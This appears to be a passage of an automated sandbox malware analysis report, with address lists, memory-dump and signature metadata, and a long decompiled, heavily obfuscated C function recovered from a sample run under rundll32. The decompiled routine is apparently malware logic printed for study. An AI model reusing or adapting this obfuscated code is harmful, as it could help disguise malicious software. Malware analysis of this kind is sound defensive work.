                                                                      0x01ffb46d
                                                                      0x01ffb478
                                                                      0x01ffb480
                                                                      0x01ffb48b
                                                                      0x01ffb498
                                                                      0x01ffb4a0
                                                                      0x01ffb4ab
                                                                      0x01ffb4ba
                                                                      0x01ffb4bb
                                                                      0x01ffb4bf
                                                                      0x01ffb4c3
                                                                      0x01ffb4c8
                                                                      0x01ffb4d0
                                                                      0x01ffb4d8
                                                                      0x01ffb4e0
                                                                      0x01ffb4e8
                                                                      0x01ffb4f0
                                                                      0x01ffb4f8
                                                                      0x01ffb503
                                                                      0x01ffb50e
                                                                      0x01ffb519
                                                                      0x01ffb524
                                                                      0x01ffb52f
                                                                      0x01ffb537
                                                                      0x01ffb542
                                                                      0x01ffb54a
                                                                      0x01ffb552
                                                                      0x01ffb557
                                                                      0x01ffb55f
                                                                      0x01ffb56a
                                                                      0x01ffb575
                                                                      0x01ffb580
                                                                      0x01ffb58b
                                                                      0x01ffb598
                                                                      0x01ffb5a2
                                                                      0x01ffb5a6
                                                                      0x01ffb5ab
                                                                      0x01ffb5b3
                                                                      0x01ffb5be
                                                                      0x01ffb5c9
                                                                      0x01ffb5d4
                                                                      0x01ffb5df
                                                                      0x01ffb5e7
                                                                      0x01ffb5f2
                                                                      0x01ffb605
                                                                      0x01ffb60c
                                                                      0x01ffb614
                                                                      0x01ffb62a
                                                                      0x01ffb62f
                                                                      0x01ffb636
                                                                      0x01ffb638
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb644
                                                                      0x01ffb644
                                                                      0x01ffb644
                                                                      0x01ffb644
                                                                      0x01ffb646
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffb64c
                                                                      0x01ffb79d
                                                                      0x01ffb7a2
                                                                      0x01ffb7a6
                                                                      0x01ffb7f4
                                                                      0x01ffb80c
                                                                      0x01ffb811
                                                                      0x01ffb814
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb652
                                                                      0x01ffb658
                                                                      0x01ffb77f
                                                                      0x01ffb784
                                                                      0x01ffb786
                                                                      0x01ffb789
                                                                      0x01ffb790
                                                                      0x01ffb795
                                                                      0x00000000
                                                                      0x01ffb65e
                                                                      0x01ffb664
                                                                      0x00000000
                                                                      0x01ffb9e6
                                                                      0x01ffb670
                                                                      0x01ffb74f
                                                                      0x01ffb755
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb676
                                                                      0x01ffb67c
                                                                      0x01ffb720
                                                                      0x01ffb721
                                                                      0x01ffb726
                                                                      0x01ffb72e
                                                                      0x01ffb731
                                                                      0x01ffb731
                                                                      0x01ffb737
                                                                      0x01ffb737
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb682
                                                                      0x01ffb688
                                                                      0x01ffb6f9
                                                                      0x01ffb6fe
                                                                      0x01ffb701
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb68a
                                                                      0x01ffb68a
                                                                      0x01ffb690
                                                                      0x00000000
                                                                      0x01ffb696
                                                                      0x01ffb696
                                                                      0x01ffb69f
                                                                      0x01ffb6a0
                                                                      0x01ffb6a7
                                                                      0x01ffb6ae
                                                                      0x01ffb6b5
                                                                      0x01ffb6c3
                                                                      0x01ffb6c5
                                                                      0x01ffb6c7
                                                                      0x01ffb6cc
                                                                      0x01ffb6cf
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb690
                                                                      0x01ffb688
                                                                      0x01ffb67c
                                                                      0x01ffb670
                                                                      0x01ffb658
                                                                      0x01ffb82a
                                                                      0x01ffb82a
                                                                      0x01ffb830
                                                                      0x01ffb985
                                                                      0x01ffb98a
                                                                      0x01ffb98f
                                                                      0x01ffb997
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb836
                                                                      0x01ffb83c
                                                                      0x01ffb94c
                                                                      0x01ffb951
                                                                      0x01ffb952
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x00000000
                                                                      0x01ffb63f
                                                                      0x01ffb63f
                                                                      0x01ffb842
                                                                      0x01ffb848
                                                                      0x01ffb8ce
                                                                      0x01ffb8d5
                                                                      0x01ffb8da
                                                                      0x01ffb8f5
                                                                      0x01ffb91c
                                                                      0x01ffb923
                                                                      0x01ffb928
                                                                      0x01ffb92d
                                                                      0x01ffb92f
                                                                      0x00000000
                                                                      0x01ffb92f
                                                                      0x01ffb84a
                                                                      0x01ffb850
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffb864
                                                                      0x01ffb865
                                                                      0x01ffb86a
                                                                      0x01ffb86c
                                                                      0x01ffb86d
                                                                      0x01ffb86f
                                                                      0x01ffb875
                                                                      0x01ffb8a2
                                                                      0x01ffb8a7
                                                                      0x01ffb8aa
                                                                      0x00000000
                                                                      0x01ffb8aa
                                                                      0x01ffb9f1
                                                                      0x01ffb9f1
                                                                      0x01ffb81e
                                                                      0x01ffb824
                                                                      0x01ffb9a9
                                                                      0x01ffb9ae
                                                                      0x01ffb9b6
                                                                      0x01ffb9b8
                                                                      0x01ffb9bd
                                                                      0x00000000
                                                                      0x01ffb9bd
                                                                      0x00000000
                                                                      0x01ffb9c3
                                                                      0x01ffb9c3
                                                                      0x01ffb9c3
                                                                      0x00000000
                                                                      0x01ffb644

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
                                                                      • API String ID: 0-2608984025
                                                                      • Opcode ID: 8cc87445c23d422a81aeb0ea8d93698663441bbee156be5339290357e261575c
                                                                      • Instruction ID: 7656163aa81d02531d878908d838161c4e23cc582830f9c5c4143039f5a51dca
                                                                      • Opcode Fuzzy Hash: 8cc87445c23d422a81aeb0ea8d93698663441bbee156be5339290357e261575c
                                                                      • Instruction Fuzzy Hash: 3E52047290C3818FE374CF24C549B9BBBE1BB94718F108A1DE6D9962A0D7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023A323, Relevance: 24.3, Strings: 19, Instructions: 509COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
                                                                      • API String ID: 0-2608984025
                                                                      • Opcode ID: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
                                                                      • Instruction ID: ba8830ef5c8373d15caca380ba80653aa4f36d96765f27482b7c81f2544ea9f9
                                                                      • Opcode Fuzzy Hash: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
                                                                      • Instruction Fuzzy Hash: B95212B150D3818FE378CF24C949B9BBBE1BB94308F108A1DE5D9962A0D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00249665, Relevance: 20.4, Strings: 16, Instructions: 365COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
                                                                      • API String ID: 0-3673879503
                                                                      • Opcode ID: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
                                                                      • Instruction ID: a0b7a226c9314d94c73bcdf86a066b50a9070753deace6b560e1ff93e78d44df
                                                                      • Opcode Fuzzy Hash: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
                                                                      • Instruction Fuzzy Hash: 411211B1508381DFE368CF65C48AA4BFBE1BBC5758F10891DE1D9862A0D7B98958CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02007BBE, Relevance: 18.2, Strings: 14, Instructions: 657COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E02007BBE(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				intOrPtr* _v288;
				void* __ecx;
				intOrPtr* _t702;
				intOrPtr* _t706;
				intOrPtr* _t709;
				intOrPtr* _t714;
				intOrPtr* _t716;
				intOrPtr _t718;
				void* _t720;
				intOrPtr _t734;
				intOrPtr _t738;
				intOrPtr _t739;
				intOrPtr* _t740;
				intOrPtr _t750;
				void* _t764;
				void* _t815;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t855;
				intOrPtr* _t861;
				void* _t863;
				void* _t865;

				_t740 = _a20;
				_push(_a40);
				_push(_a36);
				_v16 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_t740);
				_push(_a16 & 0x0000ffff);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02002550(_a16 & 0x0000ffff);
				_v8 = 0x36204f;
				_v20 = 0;
				_t863 =  &_v288 + 0x30;
				_v4 = 0;
				_v272 = 0xdc69;
				_t861 = 0;
				_v272 = _v272 + 0xffff6337;
				_v272 = _v272 + 0xffff179b;
				_t855 = 0x175d2af;
				_v272 = _v272 << 0xa;
				_v272 = _v272 ^ 0xfd5cec00;
				_v204 = 0xa9cd;
				_v204 = _v204 + 0xe741;
				_v204 = _v204 << 0xa;
				_v28 = 0;
				_t832 = 0x3a;
				_v204 = _v204 / _t832;
				_v204 = _v204 ^ 0x001ba8a3;
				_v260 = 0x5d6b;
				_t833 = 0x6f;
				_v260 = _v260 / _t833;
				_t834 = 0x1e;
				_v288 = 0;
				_v260 = _v260 * 0x73;
				_v260 = _v260 * 0x64;
				_v260 = _v260 ^ 0x0025bafc;
				_v116 = 0x8d70;
				_v116 = _v116 * 0x63;
				_v116 = _v116 ^ 0x00363250;
				_v132 = 0x5ee0;
				_v132 = _v132 << 6;
				_v132 = _v132 / _t834;
				_v132 = _v132 ^ 0x00008a66;
				_v172 = 0xa39a;
				_t835 = 0xa;
				_v172 = _v172 / _t835;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x00505c00;
				_v148 = 0xec35;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 << 6;
				_v148 = _v148 ^ 0x00040380;
				_v180 = 0xfe27;
				_v180 = _v180 >> 0xe;
				_v180 = _v180 >> 0xb;
				_v180 = _v180 ^ 0x04000000;
				_v124 = 0x1d9b;
				_v124 = _v124 >> 2;
				_v124 = _v124 + 0xe7fe;
				_v124 = _v124 ^ 0x0008ef64;
				_v100 = 0x81fc;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000007;
				_v188 = 0xe2f5;
				_v188 = _v188 ^ 0x71f5675a;
				_v188 = _v188 | 0xaa328868;
				_v188 = _v188 ^ 0xfbf78cef;
				_v176 = 0x473a;
				_v176 = _v176 >> 0xf;
				_t836 = 0x33;
				_v176 = _v176 / _t836;
				_v176 = _v176 ^ 0x80000000;
				_v80 = 0xf23d;
				_v80 = _v80 + 0xffff33d4;
				_v80 = _v80 ^ 0x00002611;
				_v156 = 0xc473;
				_v156 = _v156 >> 0xc;
				_t837 = 0x65;
				_v156 = _v156 * 0x12;
				_v156 = _v156 ^ 0x000000db;
				_v112 = 0xf10b;
				_v112 = _v112 / _t837;
				_v112 = _v112 ^ 0x000006ec;
				_v60 = 0xdfe2;
				_v60 = _v60 ^ 0xa11a41e5;
				_v60 = _v60 ^ 0xa11ac0c1;
				_v184 = 0xb35b;
				_v184 = _v184 + 0xffff738c;
				_v184 = _v184 + 0xaea7;
				_v184 = _v184 ^ 0x0000b6b5;
				_v104 = 0xd6d;
				_v104 = _v104 | 0x69c9fc48;
				_v104 = _v104 ^ 0x69c98054;
				_v280 = 0x128c;
				_v280 = _v280 | 0x3ab331cb;
				_v280 = _v280 << 0xd;
				_t838 = 0x6e;
				_v280 = _v280 / _t838;
				_v280 = _v280 ^ 0x00ee7109;
				_v192 = 0x915d;
				_v192 = _v192 << 3;
				_v192 = _v192 ^ 0x4be63910;
				_v192 = _v192 ^ 0x4be2c2bd;
				_v256 = 0x1d7e;
				_v256 = _v256 << 0xc;
				_v256 = _v256 + 0x423a;
				_v256 = _v256 >> 2;
				_v256 = _v256 ^ 0x00763d31;
				_v264 = 0xd93b;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 + 0xbaa;
				_v264 = _v264 * 0x53;
				_v264 = _v264 ^ 0x0003caf0;
				_v276 = 0x45bb;
				_v276 = _v276 >> 0xe;
				_t839 = 0x52;
				_v276 = _v276 / _t839;
				_v276 = _v276 | 0xacdb8348;
				_v276 = _v276 ^ 0xacdbabf1;
				_v168 = 0x21d1;
				_t840 = 0x5f;
				_v168 = _v168 * 0x6c;
				_v168 = _v168 | 0xdafc5a22;
				_v168 = _v168 ^ 0xdafe2196;
				_v196 = 0xddc4;
				_v196 = _v196 >> 7;
				_v196 = _v196 / _t840;
				_v196 = _v196 ^ 0x00004407;
				_v72 = 0x5faa;
				_t841 = 0x19;
				_v72 = _v72 * 0x1f;
				_v72 = _v72 ^ 0x000beafb;
				_v144 = 0x94da;
				_v144 = _v144 | 0xc2399f35;
				_v144 = _v144 ^ 0x39a01d15;
				_v144 = _v144 ^ 0xfb99dd4a;
				_v152 = 0xccbe;
				_v152 = _v152 | 0x7027dc53;
				_v152 = _v152 ^ 0xf82ab60d;
				_v152 = _v152 ^ 0x880d3695;
				_v224 = 0xbc89;
				_v224 = _v224 + 0x37f5;
				_v224 = _v224 << 4;
				_v224 = _v224 + 0xba4c;
				_v224 = _v224 ^ 0x00103e7c;
				_v88 = 0x13fb;
				_v88 = _v88 / _t841;
				_v88 = _v88 ^ 0x0000146e;
				_v216 = 0x2a85;
				_v216 = _v216 >> 0xc;
				_v216 = _v216 >> 0xb;
				_v216 = _v216 + 0xffff9599;
				_v216 = _v216 ^ 0xffffae90;
				_v64 = 0x23ad;
				_v64 = _v64 + 0x6280;
				_v64 = _v64 ^ 0x0000a8ff;
				_v244 = 0xad34;
				_t842 = 0x78;
				_v244 = _v244 / _t842;
				_v244 = _v244 | 0x167eb282;
				_v244 = _v244 + 0xffff1b5d;
				_v244 = _v244 ^ 0x167d9f04;
				_v48 = 0xe2d3;
				_t843 = 0x44;
				_v48 = _v48 / _t843;
				_v48 = _v48 ^ 0x00006548;
				_v212 = 0x1f13;
				_v212 = _v212 | 0x5cd55339;
				_v212 = _v212 * 0x69;
				_v212 = _v212 << 0xf;
				_v212 = _v212 ^ 0x0799ff86;
				_v252 = 0x103d;
				_t844 = 0x2c;
				_v252 = _v252 / _t844;
				_v252 = _v252 << 1;
				_v252 = _v252 ^ 0x1506d405;
				_v252 = _v252 ^ 0x1506fe58;
				_v228 = 0xc990;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 ^ 0xb1dbef51;
				_v228 = _v228 + 0xffff081c;
				_v228 = _v228 ^ 0xb1dafd56;
				_v40 = 0x9a48;
				_v40 = _v40 + 0xffff0212;
				_v40 = _v40 ^ 0xffffae48;
				_v108 = 0x52c;
				_v108 = _v108 >> 4;
				_v108 = _v108 ^ 0x0000049e;
				_v220 = 0x8eda;
				_v220 = _v220 | 0x6dde0b3f;
				_v220 = _v220 << 0xc;
				_v220 = _v220 >> 3;
				_v220 = _v220 ^ 0x1d1fa9c0;
				_v52 = 0xd0e6;
				_v52 = _v52 ^ 0x110e7ea1;
				_v52 = _v52 ^ 0x110ecde5;
				_v32 = 0xfc2c;
				_t845 = 0x76;
				_v32 = _v32 / _t845;
				_v32 = _v32 ^ 0x000058ce;
				_v268 = 0x3002;
				_v268 = _v268 ^ 0xd0ce5963;
				_v268 = _v268 + 0x23d4;
				_v268 = _v268 ^ 0x2e4fc162;
				_v268 = _v268 ^ 0xfe811412;
				_v236 = 0x3882;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0xffff636b;
				_v236 = _v236 << 4;
				_v236 = _v236 ^ 0xfff66e05;
				_v164 = 0x6dca;
				_t846 = 0x60;
				_v164 = _v164 / _t846;
				_v164 = _v164 + 0x77ed;
				_v164 = _v164 ^ 0x00001e7b;
				_v92 = 0x939d;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x00001fb9;
				_v76 = 0xa6db;
				_t847 = 9;
				_v76 = _v76 * 0x46;
				_v76 = _v76 ^ 0x002da3d1;
				_v44 = 0xb214;
				_v44 = _v44 << 8;
				_v44 = _v44 ^ 0x00b26442;
				_v84 = 0xa70c;
				_v84 = _v84 / _t847;
				_v84 = _v84 ^ 0x00002a18;
				_v68 = 0xaf49;
				_t848 = 0x2e;
				_v68 = _v68 / _t848;
				_v68 = _v68 ^ 0x0000641b;
				_v36 = 0x3ceb;
				_t849 = 0x59;
				_v36 = _v36 / _t849;
				_v36 = _v36 ^ 0x0000250b;
				_v140 = 0x9e7;
				_v140 = _v140 ^ 0x2629db66;
				_v140 = _v140 ^ 0xb17286d6;
				_v140 = _v140 ^ 0x975b0c98;
				_v232 = 0x59a3;
				_v232 = _v232 + 0xffff4634;
				_v232 = _v232 + 0xbf67;
				_v232 = _v232 * 0x49;
				_v232 = _v232 ^ 0x001b190f;
				_v240 = 0x1d63;
				_v240 = _v240 + 0xffffb330;
				_v240 = _v240 << 5;
				_v240 = _v240 | 0x294c4af2;
				_v240 = _v240 ^ 0xfffe5dea;
				_v96 = 0xdd85;
				_v96 = _v96 / _t849;
				_v96 = _v96 ^ 0x00000a46;
				_v248 = 0x1e49;
				_t850 = 0x45;
				_v248 = _v248 / _t850;
				_v248 = _v248 >> 4;
				_t851 = 0x1e;
				_v248 = _v248 * 0xa;
				_v248 = _v248 ^ 0x000078ce;
				_v160 = 0x9fac;
				_v160 = _v160 / _t851;
				_v160 = _v160 + 0xffff662a;
				_v160 = _v160 ^ 0xffff2cd4;
				_v56 = 0x53a;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x000063d6;
				_v208 = 0x254f;
				_v208 = _v208 + 0xffff5d99;
				_v208 = _v208 >> 6;
				_v208 = _v208 >> 8;
				_v208 = _v208 ^ 0x0003aa31;
				_v136 = 0xe4f;
				_t852 = 5;
				_v136 = _v136 / _t852;
				_t853 = 0x59;
				_v136 = _v136 / _t853;
				_v136 = _v136 ^ 0x00004294;
				_v200 = 0xf4ca;
				_v200 = _v200 + 0xfcaa;
				_v200 = _v200 << 0x10;
				_v200 = _v200 + 0x7aed;
				_v200 = _v200 ^ 0xf1741e18;
				_v120 = 0x8825;
				_v120 = _v120 ^ 0xde537c51;
				_v120 = _v120 + 0xffff7f06;
				_v120 = _v120 ^ 0xde5329e7;
				_v128 = 0x8774;
				_v128 = _v128 * 0x60;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0x000048ff;
				_t854 = _v16;
				_t702 = _v284;
				while(1) {
					L1:
					_t815 = 0x1a641754;
					while(1) {
						_t865 = _t855 - _t815;
						if(_t865 > 0) {
							goto L19;
						}
						L3:
						if(_t865 == 0) {
							__eflags = E01FF9D2F(_t854, _a4);
							_t855 = 0x323551c7;
							_t720 = 1;
							_t861 =  !=  ? _t720 : _t861;
							goto L13;
						} else {
							if(_t855 == 0x175d2af) {
								_t855 = 0x3b541ff0;
								continue;
							} else {
								if(_t855 == 0x5ea51a5) {
									_push(_t745);
									_t702 = E02007AF1(_v244, _v48, _v24, _t745, _a36, _t745, _a16, _t745, _v156, _v212, _v252, _v228);
									_t863 = _t863 + 0x2c;
									_v284 = _t702;
									__eflags = _t702;
									_t855 =  !=  ? 0xa2907ca : 0x6317f3c;
									goto L14;
								} else {
									if(_t855 == 0x6317f3c) {
										E01FF7E91(_v24, _v120, _v128);
									} else {
										if(_t855 == 0x9b9cf87) {
											__eflags = E0200C2F5(_t854, _v204, __eflags) - _v260;
											_t815 = 0x1a641754;
											_t702 = _v284;
											_t745 = _v288;
											_t855 =  ==  ? 0x1a641754 : 0x323551c7;
											continue;
										} else {
											if(_t855 != 0xa2907ca) {
												L41:
												__eflags = _t855 - 0x34df9831;
												if(__eflags != 0) {
													_t702 = _v284;
													while(1) {
														_t865 = _t855 - _t815;
														if(_t865 > 0) {
															goto L19;
														}
														goto L3;
													}
													goto L19;
												}
											} else {
												_t871 = _t740;
												if(_t740 != 0) {
													_push(0x1ff1640);
													_push(_v52);
													_push(_v220);
													_t739 = E01FF5DFC(_v40, _v108, _t871);
													_t745 = _t739;
													_t863 = _t863 + 0xc;
													_v288 = _t739;
												}
												_t564 =  &_v92; // 0xa46
												_t734 = E020023BF(_v32, _v268, _a12, _t745, _t745, _v176 | _v188 | _v100 | _v124 | _v180 | _v148 | _v172 | _v132 | _v116, _v284, _t745, _t745, _v236, _t745, _v164,  *_t564);
												_t854 = _t734;
												_t760 = _v76;
												E02000D6D(_v76, _v44, _v84, _v288);
												_t863 = _t863 + 0x34;
												if(_t734 == 0) {
													L38:
													_t855 = 0x24a54ebe;
												} else {
													_v12 = 1;
													_t738 = E01FFA074( &_v12, _t760, _v68, _v36, _t854, _v140);
													_t863 = _t863 + 0x14;
													_v12 = _t738;
													_t855 = 0x35deb4bf;
												}
												L13:
												_t702 = _v284;
												L14:
												_t745 = _v288;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t861;
						L19:
						__eflags = _t855 - 0x24a54ebe;
						if(_t855 == 0x24a54ebe) {
							E01FF7E91(_t702, _v136, _v200);
							_t855 = 0x6317f3c;
							goto L40;
						} else {
							__eflags = _t855 - 0x323551c7;
							if(_t855 == 0x323551c7) {
								E01FF7E91(_t854, _v56, _v208);
								goto L38;
							} else {
								__eflags = _t855 - 0x335a9f57;
								if(_t855 == 0x335a9f57) {
									_push(_t745);
									_t706 = E01FFF853(_v72, _v144, _v152, _v80, _v224, _v28, _t745, _t745, _v88);
									__eflags = _t706;
									_v24 = _t706;
									_t855 =  !=  ? 0x5ea51a5 : 0x34df9831;
									E01FFDE81(_v216, _v28, _v64);
									_t863 = _t863 + 0x24;
									L40:
									_t745 = _v288;
									_t815 = 0x1a641754;
									goto L41;
								} else {
									__eflags = _t855 - 0x35deb4bf;
									if(_t855 == 0x35deb4bf) {
										__eflags = _t740;
										if(_t740 == 0) {
											_t750 = 0;
											__eflags = 0;
										} else {
											_t750 =  *_t740;
										}
										__eflags = _t740;
										if(_t740 == 0) {
											_t709 = 0;
											__eflags = 0;
										} else {
											_t709 =  *((intOrPtr*)(_t740 + 4));
										}
										E020046C1(_v16, _t854, _t750, _v232, _v240, _v96, _t709, _v248, _t750, _v160);
										_t863 = _t863 + 0x20;
										asm("sbb esi, esi");
										_t855 = (_t855 & 0xd7847dc0) + 0x323551c7;
										goto L13;
									} else {
										__eflags = _t855 - 0x3b541ff0;
										if(_t855 != 0x3b541ff0) {
											goto L41;
										} else {
											_v20 = 0x200;
											_t714 = E01FF54FB(0x200);
											_t858 = _t714;
											_t764 = 0x200;
											__eflags = _t714;
											if(__eflags != 0) {
												_t716 = E01FF71C3(_v184, _v104, _t858, _v280, _v192,  &_v20);
												_t863 = _t863 + 0x14;
												__eflags = _t716;
												if(_t716 == 0) {
													_push(_v276);
													_push(_t764);
													_t718 = E01FFECFE(_v256, _v264, _t858, _v272, _t764);
													_t863 = _t863 + 0x14;
													_v28 = _t718;
												}
												E01FFDE81(_v168, _t858, _v196);
											}
											_t855 = 0x335a9f57;
											goto L13;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}




















































































































                                                                      0x02007bcd
                                                                      0x02007bd6
                                                                      0x02007be0
                                                                      0x02007be7
                                                                      0x02007bee
                                                                      0x02007bf5
                                                                      0x02007bfc
                                                                      0x02007c03
                                                                      0x02007c04
                                                                      0x02007c05
                                                                      0x02007c0c
                                                                      0x02007c13
                                                                      0x02007c1a
                                                                      0x02007c1c
                                                                      0x02007c21
                                                                      0x02007c2e
                                                                      0x02007c35
                                                                      0x02007c38
                                                                      0x02007c41
                                                                      0x02007c49
                                                                      0x02007c4b
                                                                      0x02007c55
                                                                      0x02007c5d
                                                                      0x02007c62
                                                                      0x02007c67
                                                                      0x02007c6f
                                                                      0x02007c77
                                                                      0x02007c7f
                                                                      0x02007c84
                                                                      0x02007c91
                                                                      0x02007c96
                                                                      0x02007c9c
                                                                      0x02007ca4
                                                                      0x02007cb0
                                                                      0x02007cb5
                                                                      0x02007cc0
                                                                      0x02007cc3
                                                                      0x02007cc7
                                                                      0x02007cd0
                                                                      0x02007cd4
                                                                      0x02007cdc
                                                                      0x02007cef
                                                                      0x02007cf6
                                                                      0x02007d01
                                                                      0x02007d0c
                                                                      0x02007d1f
                                                                      0x02007d26
                                                                      0x02007d31
                                                                      0x02007d43
                                                                      0x02007d46
                                                                      0x02007d4d
                                                                      0x02007d55
                                                                      0x02007d60
                                                                      0x02007d6b
                                                                      0x02007d75
                                                                      0x02007d7d
                                                                      0x02007d88
                                                                      0x02007d90
                                                                      0x02007d95
                                                                      0x02007d9a
                                                                      0x02007da2
                                                                      0x02007dad
                                                                      0x02007db5
                                                                      0x02007dc0
                                                                      0x02007dcb
                                                                      0x02007dd6
                                                                      0x02007dde
                                                                      0x02007de6
                                                                      0x02007dee
                                                                      0x02007df6
                                                                      0x02007dfe
                                                                      0x02007e06
                                                                      0x02007e11
                                                                      0x02007e22
                                                                      0x02007e27
                                                                      0x02007e30
                                                                      0x02007e3b
                                                                      0x02007e46
                                                                      0x02007e51
                                                                      0x02007e5c
                                                                      0x02007e67
                                                                      0x02007e77
                                                                      0x02007e7a
                                                                      0x02007e81
                                                                      0x02007e8c
                                                                      0x02007ea2
                                                                      0x02007ea9
                                                                      0x02007eb4
                                                                      0x02007ebf
                                                                      0x02007eca
                                                                      0x02007ed5
                                                                      0x02007edd
                                                                      0x02007ee5
                                                                      0x02007eed
                                                                      0x02007ef5
                                                                      0x02007f00
                                                                      0x02007f0b
                                                                      0x02007f16
                                                                      0x02007f1e
                                                                      0x02007f26
                                                                      0x02007f2f
                                                                      0x02007f32
                                                                      0x02007f36
                                                                      0x02007f3e
                                                                      0x02007f46
                                                                      0x02007f4b
                                                                      0x02007f53
                                                                      0x02007f5b
                                                                      0x02007f63
                                                                      0x02007f68
                                                                      0x02007f70
                                                                      0x02007f75
                                                                      0x02007f7d
                                                                      0x02007f85
                                                                      0x02007f8a
                                                                      0x02007f97
                                                                      0x02007f9b
                                                                      0x02007fa3
                                                                      0x02007fab
                                                                      0x02007fb8
                                                                      0x02007fbd
